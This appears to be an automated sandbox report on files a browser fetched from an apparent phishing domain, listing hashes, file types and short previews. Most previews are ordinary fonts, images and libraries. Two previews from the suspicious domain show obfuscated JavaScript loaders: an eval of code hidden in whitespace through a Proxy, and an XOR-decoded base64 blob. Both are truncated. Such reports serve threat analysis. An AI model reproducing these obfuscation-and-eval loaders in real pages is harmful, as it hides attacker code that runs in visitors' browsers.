                                                                                  Preview:.goog-inline-block{position:relative;display:-moz-inline-box;display:inline-block}* html .goog-inline-block{display:inline}*:first-child+html .goog-inline-block{display:inline}.recaptcha-checkbox{border:none;font-size:1px;height:28px;margin:4px;width:28px;overflow:visible;outline:0;vertical-align:text-bottom}.recaptcha-checkbox-border{-webkit-border-radius:2px;-moz-border-radius:2px;border-radius:2px;background-color:#fff;border:2px solid #444746;font-size:1px;height:24px;position:absolute;width:24px;z-index:1}.recaptcha-checkbox-borderAnimation{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFQAAANICAYAAABZl8i8AAAAIGNIUk0AAHomAACAhAAA+gAAAIDoAAB1MAAA6mAAADqYAAAXcJy6UTwAAAAGYktHRAD/AP8A/6C9p5MAAHq9SURBVHja7Z15fFTl9f/fd9ZM9n1PgCyEXSSRNYKCgAuiIipuVSuudavV1tq6W/WrtnWrrZbWDZUqUqUoCoIEQhBI2JesELKvM9mTWe7c3x83d5xAlkky8fv92ft5vfKC19znOWfuZ571POc5B1SoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKFChQoVKlSoUKHifwGCRqsTNFrdj6VPq9XqtNofT9+wvutQyEyad8t9IaPPntFUd
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (2645), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):2645
                                                                                  Entropy (8bit):5.114618176267738
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:183F94EB3985C89E5C7DF7901A345CFC
                                                                                  SHA1:F2F74303790BCFEAB36448A5BA1C1087A85D30AF
                                                                                  SHA-256:DF5B22790F75222CDA09B8676CC8697695A87155FDDA79FACBD0F6AD94D56F04
                                                                                  SHA-512:9A173D815A5C0A4888194A491D177D86F8C32D1A31EB05F055076AB85FD6EFCC4B864EA6E0D29506A7AE87F1B128271B38098B599ADC1EE9308E6984849680B8
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://enervit.freshdesk.com/assets/cdn/portal/scripts/preview-interactions.js
                                                                                  Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[97],{199:function(e,t){function n(){return window.self!==window.top}function r(e,t,n,r,i,o){var a=document.createElement("div");return a.className=e,a.style.position="fixed",a.style.top="".concat(n,"px"),a.style.left="".concat(r,"px"),a.style.width="".concat(i,"px"),a.style.height="".concat(o,"px"),a.style.background="rgba(0, 0, 0, 0.7)",a.style.pointerEvents="auto",a.style.zIndex="1030",g.appendChild(a),a}function i(){if(p){p.overlayTop.remove(),p.overlayLeft.remove(),p.overlayRight.remove(),p.overlayBottom.remove(),g.classList.remove("fw-nudge-overlay-active"),g.style.overflow="";var e=document.querySelectorAll(".fw-nudge-allow-interaction");e.forEach(function(e){e.classList.remove("fw-nudge-allow-interaction"),e.style.zIndex=""}),p=null}}function o(e,t){window.scrollTo(0,0);var n=document.querySelector(e);if(n){var i=n.getBoundingClientRect(),o=window.scrollY||window.pageYOffset,a=window.scrollX||window.pageXOffset,s=i.top+o,l=i.l
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):128
                                                                                  Entropy (8bit):4.750616928608237
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:D90F02F133E7B82AF89B3E58526AC459
                                                                                  SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                                                                  SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                                                                  SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCWscV50j2zFAEgUNX1f-DRIFDRObJGMhIzBID-YmquQSSgl_fCpz-aEBYxIFDc8jKv8SBQ3Fk8QkEgUNiaVnyxIFDcMZOZASBQ2JpWfLEgUNwxk5kBIFDdACQOwSBQ2oXeN0IT39-q0MaK4H?alt=proto
                                                                                  Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKSAoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 14892, version 1.0
                                                                                  Category:downloaded
                                                                                  Size (bytes):14892
                                                                                  Entropy (8bit):7.98489201092774
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:9EC6DEAF6BADA919E20B98F9F7B718B1
                                                                                  SHA1:501D36403AD8205E4644532600019ECB10F5CB0A
                                                                                  SHA-256:7B348B30EA1FE43857E68FC462C29E5C6E63C97666AF75135C4396A272E54762
                                                                                  SHA-512:03849431CEF204A1584FFE6F23DBE86730AFD076146AB3D1855B9C3402168A97FAA8A529E69FAE45EA24CFF7110C2930CB4744162BA0ED95D95600F6E777B322
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://fonts.gstatic.com/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2
                                                                                  Preview:wOF2......:,.......|..9..........................n..B....`..b...L.4..d..6.$..D. ..f..4..v%..........D..dd.do......:d..M....E.&..J..G....3.Mxp....i....V..u$.[O.;MU.:j.?..{+/<....s....^[..d.d.....t A....`..z....IN^.......2......mY.kF...\...UYU..........$.O=5..2q..L.2.1.c.....`x~n=.'Ur.66V.f]./..L1..P..<.0.<.8.....Z/.+.H....y..F....h5....V.j.....l..O#.:-Q....9g....:..?..8v];u,O..'....c.\r......].&w.....%@..Z.^....$.,dJ....W.{.....h8}4..S/.sZ...f."$..`a.$Mb.....;.W.."..y.H.<.g.......oNS..MO....X.%.8..y.\...ly..w..?-.~.o.ZZ~G.....B.....@...._....g.fF_...d-...aA_..#k.I.....x...P.}z..JQ&E........).P|."g.#.)Q.*T...}.PD.T+<}c+.||0...2.F..hD.X.J.O.eJ:.%ZW.m.K.Jd..*c.7.....T.cr.2....DD.........2..y..?/g...... ={..c /.....X.0.F.F.PX.P..!..K..K.....i.%....B.."...A....F.........4..........S........z$`.T..h...E..........._%=..).)......x)...A.J..K...?.V.......w.Y}..N.....}..>.......%.f.O..o.{..=wz.e_&.O\..*..Q..c.'...X&.1wS.R..AY...G.....Q.f...z..E..u8&V
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):35786
                                                                                  Entropy (8bit):5.058073854893359
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                                  SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                                  SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                                  SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/xymSd4p81UrsRKAcd24
                                                                                  Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                  Category:downloaded
                                                                                  Size (bytes):644
                                                                                  Entropy (8bit):4.6279651077789685
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:541B83C2195088043337E4353B6FD60D
                                                                                  SHA1:F09630596B6713217984785A64F6EA83E91B49C5
                                                                                  SHA-256:2658B8874F0D2A12E8726DF78AC8954324C3BBE4695E66BDEF89195FDE64322F
                                                                                  SHA-512:B2AE42BA9D3A63D3ACB179051B005F2589F147D94F044616AE5DC5705E873F16057C56934262841191263B4C35804EF188BD38CF69CCE0F4B2CF76C05F17B8AD
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/uvCTt0c1WaXaulifFF5YCxQIjTQDMS4UstLvEt7Nk6ABarydmvw12129
                                                                                  Preview:RIFF|...WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHK....W`$....z..".Y..P}0;.PE..G..h....9.@..`..2.......=.T.....-3..ow.*...&......VP8 :...0....*....>m&.M.!"......i...O...(.........g....w...XG...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                                  Category:downloaded
                                                                                  Size (bytes):36696
                                                                                  Entropy (8bit):7.988666025644622
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                                  SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                                  SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                                  SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/GDSherpa-regular.woff
                                                                                  Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                  Category:dropped
                                                                                  Size (bytes):25216
                                                                                  Entropy (8bit):7.947339442168474
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:F9A795E2270664A7A169C73B6D84A575
                                                                                  SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                                  SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                                  SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:downloaded
                                                                                  Size (bytes):268
                                                                                  Entropy (8bit):5.111190711619041
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:59759B80E24A89C8CD029B14700E646D
                                                                                  SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                  SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                  SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/rsaQXvGfU1axx6WABYbvquvK7C8KGyb304Bp8jef193
                                                                                  Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:dropped
                                                                                  Size (bytes):7390
                                                                                  Entropy (8bit):4.02755241095864
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                                                  SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                                                  SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                                                  SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                  Category:downloaded
                                                                                  Size (bytes):892
                                                                                  Entropy (8bit):5.863167355052868
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:41D62CA205D54A78E4298367482B4E2B
                                                                                  SHA1:839AAE21ED8ECFC238FDC68B93CCB27431CD5393
                                                                                  SHA-256:20A4A780DB0BCC047015A0D8037EB4EB58B3E5CB338673799C030A3E1B626B40
                                                                                  SHA-512:82B9806490A0DB493DA16466738437B9BB54B979075DB58C89CA0D192D780DDB5ED888E10CE76A53D48D30D5013791CAC7AB468D85B61D32766140DD53DC9044
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/qr9QIecbeEgJj5NBiaefPn1PwG3wIZS2AYCWQWz1l267140
                                                                                  Preview:RIFFt...WEBPVP8X....0.../../..ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH=......m[..H.A.).U....A..C.u@. ....L.......;.....$3{2{....3..V6.i.W.F.h..ee^k.:..cl.Z.eb.....).IZ....!....;X.:&...hF0...kM......!W5.ak8.......#V.s...2...`..v...}.(0 p../s.'VS`SjX.B.,...v.#./I....}.b....^*1..k.:F9hgb.HgW.Q^.r}..Y5....'.JJ....&.."]<.M.Z)o.H..].i.H1..G.P>.b.{.G.\BYx*.[.y...?L....:.%.d......%.q..VP8 @...0....*0.0.>U .E..!.4.8.D...o..z...A....Z........?..z......k...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (65447)
                                                                                  Category:downloaded
                                                                                  Size (bytes):89501
                                                                                  Entropy (8bit):5.289893677458563
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                  SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                  SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                  SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                  Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):4712061
                                                                                  Entropy (8bit):2.583772531747173
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:E34A613844E71AD9EA25A2FAAB768F3F
                                                                                  SHA1:34844596642BED7752C4AED44721CEE52593B344
                                                                                  SHA-256:D767A16A68A568D204E0E4283BDDB8A9702CCF95BF2715D512C4AE39C3D79AB5
                                                                                  SHA-512:8D5342EC77557793F73701400220B10421E6B1ED941876554D27F27A0573644F26C66FA4AB7019E666F6471688E2F7857394CC127197EF109FC076BC5534342C
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/34Rp8D2Bw7W2xsMGsHGwvKyCijqkvaQjHrKIKJ867110
                                                                                  Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, ASCII text, with very long lines (17081), with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):22116
                                                                                  Entropy (8bit):5.952886689981464
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:EAF0B3ABE5CFB16D751AAB5B1DAC1104
                                                                                  SHA1:B1E562D9E5CECA6FFD821A834443320F570BC4F2
                                                                                  SHA-256:028722BAE185C30331A12073A9CD53C92F344D9CBF454D6E4BE1CE1D13A8FDE3
                                                                                  SHA-512:FEEF1FCD6F1C75E9EE097EF94A9131CD7E5BCD1E0F394165FD004B550426CF98D66275A12ACE926B734F338C53638716DC965E7B40F0B4D8EECEE0D0D0991939
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/GUGXxy/
                                                                                  Preview:<script>..function QAnWoAoojM(EmDUqtlkyG, pqLHsYtWsZ) {..let pxhzzqVCLu = '';..EmDUqtlkyG = atob(EmDUqtlkyG);..let xFtBJIvYgu = pqLHsYtWsZ.length;..for (let i = 0; i < EmDUqtlkyG.length; i++) {.. pxhzzqVCLu += String.fromCharCode(EmDUqtlkyG.charCodeAt(i) ^ pqLHsYtWsZ.charCodeAt(i % xFtBJIvYgu));..}..return pxhzzqVCLu;..}..var OlgsgGpjPs = QAnWoAoojM(`aRUsQRggGm9ANjZbbVsFJB48CWt6BSBXFH4EPkYhJx9hUB49QSVCMTAUNh5CflhhA2o4DyEdGyNMcQ9rJgU9WgEkUEI5eCYFPVoBJE48QSdoRCdHBSAddRxrNgIhWQJ+DSNcMTEAI1IDNUAsXCl6ByVSCX8CJlE3egU9SgEkAWJZN3pSYQJfYUEsQT0lEiAeGyNAIloqeww8EU9sQTxQNjwWOw18WmNFDzc2FCZDBW5jRV0hIkYJRh8zGiZcKn0HO1wTeEkuZB0yLQgGGTQDI10dDTQ5UBhlXRVkDj4FIl9DCjYGVCIdEShXQzwbFXR9ZioifRkyKTdiJRIgOlc2aRoGezxtLwdXATIDHUUgLFMpUDY4Bi1dFiMEHHFJNi0NRh0NPD9pQxZeLQANIAIXfR0zBQldHgJTf38cPBsWATxkPAhlCxstBXAgDSw4ehg7HgZ7NxslJnIWGS0OVA0WJyhXQzwbFXR9ZioiSwcJXAkDJQJfOno1YAkGXgI8BHxlQR8DBUAdAlM9ehsjIAxddBslImEHCV0ZRx4CU39/HBYFFXYSZzwYBkEEKSNJIBIwOmkpGQEGXjA5AxhhBzRce1oIFiQiVyZlBCt0KCMEJnIeCjYVXyY7Nz96OSMgDFoFMi8M
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                  Category:dropped
                                                                                  Size (bytes):1298
                                                                                  Entropy (8bit):6.665390877423149
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:32CA2081553E969F9FDD4374134521AD
                                                                                  SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                                  SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                                  SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                                                  Category:downloaded
                                                                                  Size (bytes):2144
                                                                                  Entropy (8bit):7.883338057643445
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:6048185A1AE16CB690BDC3060E063C64
                                                                                  SHA1:B58C38177A021CDDE6B44370277627C9F3F6F22E
                                                                                  SHA-256:6F0494F1950C449B9A44871176F80B57AF89D542BB7939F32182CF6276B76154
                                                                                  SHA-512:E03D3D0E06415D25F23056759B9D70596CD364E12AE38199104862894DF6C3D2C4FB6C95A8FDAC815CBC05AB4CC8D9AE4F270526172170601B78578671A090DD
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://s3.amazonaws.com/cdn.freshdesk.com/data/helpdesk/attachments/production/156003954540/original/PTiHt9qRb1C4TyB5En3ZG-X76H6VeEpmhw.png?1742086631
                                                                                  Preview:.PNG........IHDR...l................'IDAThC.{L.e........P..M......iQ...iE.j..m..Q...@.M.MX..:K.K...N..).l)*%..E...s........8n..7~..}..}...y..y_....[.:~---U...y..7T...O.]....F=z]:..0v...,{.."..Xh..].....V].h...x........Ub=g.........9\5..qoff..Y.d..;w.(.F..zzz.Zy...2#...\d.;...?11qymmm.:.....>. ,%%.oYY..c..x`[..y.!...C....+V...,...........#.....A.*...d2...-`r6,,.^.z.LJJ:ni..0Hh....k6.-.h......|@.A....a.M.W...3......#....Oa|3.3>...G._wssK...O.4...\....xU...{..w...G-.A.V.2....KKXG.......`...{S.....C!,....0...'....]..@.Z....k%..[...Y.'Z.H...zyy......777...p..SDF.).=...}...cq...`..wrr.B..G.E.....~..:....qT.,hhhH.....G...N.)y r....G..SZZ..|.:r&m....7n.........q.i.........|u..!..H.d..u.V.))Q.a.6....'.H.......4)A.*.Pr1.V!....).:..i.A.Nd..........t.v....V...d..E..&z{{...#........w.Z.......V..C...(......>....M`....1.M..E.i.*uu.f.r.^40..Bs....e..^.........t......2[.cd3.J./..E...&......<.Y....:...~..i4..C.0..q."......"....[..L.....|G..F...
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (10450)
                                                                                  Category:downloaded
                                                                                  Size (bytes):10498
                                                                                  Entropy (8bit):5.327380141461276
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:E0D37A504604EF874BAD26435D62011F
                                                                                  SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                                  SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
